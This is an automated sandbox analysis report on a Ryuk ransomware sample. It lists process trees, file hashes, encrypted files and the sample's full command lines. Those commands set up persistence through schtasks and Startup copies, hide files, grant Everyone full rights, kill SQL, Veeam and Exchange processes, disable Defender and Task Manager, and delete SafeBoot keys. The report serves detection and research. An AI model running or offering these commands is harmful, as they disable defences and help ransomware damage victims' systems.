PID 1348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 684 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 684 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 684 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 684 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 684 wrote to memory of 1320 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 1348 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 588 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 588 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 588 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 588 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 588 wrote to memory of 1240 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 1348 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 1348 wrote to memory of 984 N/A C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe C:\Windows\SysWOW64\cmd.exe
PID 984 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 984 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 984 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe
PID 984 wrote to memory of 948 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\attrib.exe

Views/modifies file attributes

evasion
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A
N/A N/A C:\Windows\SysWOW64\attrib.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c copy C:\ProgramData\ryuk.exe "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RYUK /TR C:\ProgramData\ryuk.exe /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s "%appdata%\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\attrib.exe

attrib +h +s "C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN ryk /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /RU SYSTEM /RL HIGHEST /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\schtasks.exe

schtasks /CREATE /SC ONLOGON /TN RyuK /TR "C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe" /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s ryuk.exe

C:\Windows\SysWOW64\attrib.exe

attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c attrib +h +s C:\ProgramData\ryuk.exe

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\taskkill.exe

taskkill /f /t /im veeam*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c taskkill /t /f /im sql*

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c start cmd.exe /c taskkill /t /f /im sql* && taskkill /f /t /im veeam* && taskkill /F /T /IM MSExchange* && taskkill /F /T /IM Microsoft.Exchange* && taskkill /F /T /IM pvx* && taskkill /F /T /IM dbsrv* && exit

C:\Windows\SysWOW64\cmd.exe

cmd.exe /c icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\taskkill.exe

taskkill /t /f /im sql*

C:\Windows\SysWOW64\icacls.exe

icacls * /grant Everyone:(OI)(CI)F /T /C /Q

C:\Windows\SysWOW64\reg.exe

reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLinkedConnections /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog1 C:\ProgramData\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy hrmlog2 C:\ProgramData\hrmlog2

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy RYUKID C:\ProgramData\RYUKID

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy C:\ProgramData\hrmlog1 %userprofile%\Desktop\hrmlog1

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c Copy "C:\ProgramData\RyukReadMe.txt " "%userprofile%\Desktop\RyukReadMe.txt "

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policies\System /v DisableTaskMgr /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\reg.exe

reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender" /v DisableAntiSpyware /t REG_DWORD /d 1 /f

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_CURRENT_USER\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

C:\Windows\SysWOW64\reg.exe

reg delete HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SafeBoot /va /F

Network

N/A

Files

C:\ProgramData\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe

MD5 d2e194259106bca3b42dc8690d340b59
SHA1 edcd63a3125854ed72cb5811f08644a87e265e3b
SHA256 788ad5c53b3fc95ff2ae004d0449b76fede8bafad608e0603caca7cd044c8fbc
SHA512 4cecf1db68cd71b92b2e968719a365397b3ccd16340a952a8901647e9829b0a6e8d4cb1f948fb792f2cc58e4f6e289fd81cb104b43ddc8469c0671935e653a13

C:\Users\Admin\AppData\Local\Temp\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\Users\Admin\AppData\Local\Temp\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\Users\Admin\AppData\Local\Temp\RYUKID

MD5 bea6ddd31c498e9f4e9f6bc95923ee3e
SHA1 0cfd17881260146fb9417dbf9694fa6ef2211105
SHA256 8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
SHA512 910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

C:\ProgramData\hrmlog2

MD5 f3642fa051609bd3e193a24379b547ec
SHA1 920dca74fd4c08cc17cadf3d7a5169f201296075
SHA256 580771d1987a4bfaf0a917d72ffc3c65e7f83165125f1b15571cf78126c959eb
SHA512 24b5cef7665e9b85e0b5406f2c8fd7cc2134c96f088e436eb3f6ede566a235b5177d80e97339057e1726c6fe7821f931ab8341041f3aebaffd718efe3411f240

C:\ProgramData\RYUKID

MD5 bea6ddd31c498e9f4e9f6bc95923ee3e
SHA1 0cfd17881260146fb9417dbf9694fa6ef2211105
SHA256 8b1a4555eae63973a35fd1727681e65dbfff2bf071ea87aaf6af9fd76548d1b5
SHA512 910998af02ea9f9c6c5156d0a7c247ed14ce6043e712f7cabad00fe9e922e8a1bf4e62963b3da994058257bfa46220b3164a4fceafbabd2cef7ed8631577272f

C:\ProgramData\hrmlog1

MD5 d9876c40c0deeed3a19a371bdc127213
SHA1 86c2e629e33a29ef280896b6415186c119e211e3
SHA256 7436733fab8e99733cdf304ceaeb157e7effe7dfd2d98a5eef747b8ac380f95e
SHA512 00577b55ee16959b5aa81ca6fb924c2facab426e610043e96207440c282253ef80ea52971f97f6cd101e13ec972762c7f834c4fe0cd3ae319b102616f6f85323

C:\ProgramData\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.html

MD5 a641bf8ac8307aad57ecab53872e67db
SHA1 6fa8d69a859c34b8e75223ed8f426dbdf3d03df7
SHA256 9383b707c654726704f6968a151b67fa564653e91c8f3a31298b8cb81469d2ce
SHA512 7d32498611e54397ee320ab09380356c3470daf8e45e0a41d550df129027ca7279f14ec2b9f1b33d312ddca7b7f446f1c5689cae83502f4144f5807e39dcf5f4

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\RyukReadMe.txt

MD5 f69127370e1f1aede86e881dd446f6aa
SHA1 65298f80e3b97f59ea45179463ab9c5cc3ee9337
SHA256 da7ec116558c3b21f68b5842391348e3597704f6f80ad11edeb9cc4fc9cc12bc
SHA512 5e80879ceabb6cb9e19a69d00942cb13989b063b416de55d9a00060b0180f38da0340b154652e6a01b9d48675da24a83b4023db3d20b46ba9729e0b26d98a8d4

Analysis: behavioral2

Detonation Overview

Submitted

2023-03-09 18:31

Reported

2023-03-09 18:33

Platform

win10v2004-20230220-en

Max time kernel

147s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe"

Signatures

Ryuk

ransomware ryuk

Deletes shadow copies

ransomware

Disables Task Manager via registry modification

evasion

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation C:\Windows\SysWOW64\cmd.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\cmd.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ryuk.exe C:\Windows\SysWOW64\attrib.exe N/A

Modifies file permissions

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\icacls.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\G: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\H: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\B: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\P: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\A: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\U: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\W: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\I: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\N: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\O: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\S: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\V: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\R: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\E: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\J: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\K: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\L: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\M: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Q: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\T: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\X: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened (read-only) \??\Y: C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\plug_ins\PDDom.api.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\images\themes\dark\sat_logo_2x.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\ir.idl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-netbeans-lib-uihandler.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL048.XML.[[email protected]].RYKCRYPT C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\s_filetype_xd.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\org-netbeans-core-ui.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Retail-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlus2019R_Grace-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectProCO365R_SubTest-ul-oob.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\Locales\sr-Latn-RS.pak.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\nb-no\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\images\themeless\Playstore\ko_get.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\PowerPntLogo.contrast-white_scale-140.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\vlc.mo.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\themes\dark\arrow-up.gif.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\file_types\comment.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\desktop-connector-files\css\main-selector.css.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\ResiliencyLinks\VisualElements\SmallLogoDev.png.DATA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\visualvm\modules\locale\org-netbeans-core-windows_visualvm.jar.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\1033\AccessRuntime_eula.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\sdxs\FA000000018\cardview\lib\native-common\assets\cardview-warning.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-openide-text.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTrial2-ppd.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\PersonalR_Trial-pl.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Resource\TypeSupport\Unicode\Mappings\Adobe\zdingbat.txt.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\psfont.properties.ja.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\config\Modules\org-openide-options.xml.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_removeme-default_18.svg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\home\images\icons.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\ob-preview\images\themeless\forms_poster.jpg.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\signatures\js\nls\pl-pl\ui-strings.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\features\org.eclipse.ecf.filetransfer.httpclient4.ssl.feature_1.0.0.v20140827-1444\META-INF\ECLIPSE_.RSA.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_OEM_Perp-ul-phn.xrm-ms.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\LogoImages\WinWordLogo.contrast-white_scale-80.png.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Office16\PAGESIZE\PGLBL083.XML.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\PIXEL\THMBNAIL.PNG.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\vstoee90.tlb.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesX86\Microsoft Analysis Services\AS OLEDB\140\Cartridges\sql120.xsl.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\js\plugin.js.[[email protected]].RYK C:\Users\Admin\AppData\Local\Temp\Ryuk86.bin.exe N/A
